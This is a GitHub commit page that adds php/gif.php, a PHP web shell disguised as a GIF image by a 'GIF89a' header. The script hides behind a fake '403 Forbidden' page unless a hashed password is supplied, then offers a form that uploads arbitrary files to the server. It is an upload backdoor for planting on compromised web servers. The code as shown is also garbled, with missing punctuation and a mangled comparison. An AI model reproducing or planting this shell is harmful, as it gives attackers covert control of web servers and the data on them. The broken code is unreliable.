Skip to content

Commit

Permalink
Create gif.php
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed Jun 8, 2015
1 parent e3d5a00 commit 009d44d
Showing 1 changed file with 16 additions and 0 deletions.
16 changes: 16 additions & 0 deletions php/gif.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
GIF89a1
error_reporting(NULL)
$me=$_SERVER['PHP_SELF']
$NameF=$_REQUEST['NameF']
$nowaddress='<input type=hidden name=address value="'.getcwd().'">'
$pass_up="a13756bf1e2bd46921c135232774fc5f"
if (isset($_FILES["elif"]) and
$_FILES["elif"]["error"] )
move_uploaded_file($_FILES["elif"]["tmp_name"], $_FILES["elif"]["name"])
echo $ifupload=" ItsOk "
if(md5($_REQUEST['ssp'])
=$pass_up)
print "<title>403 Forbidden</title><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server </p>"
exit()
$_SESSION['LoGiN']=true
echo "<form action=$me method=post enctype=multipart/form-data> $nowaddress <input type=file name=elif ><input type=submit value=Upload /></form>"

0 comments on commit 009d44d

Please sign in to comment.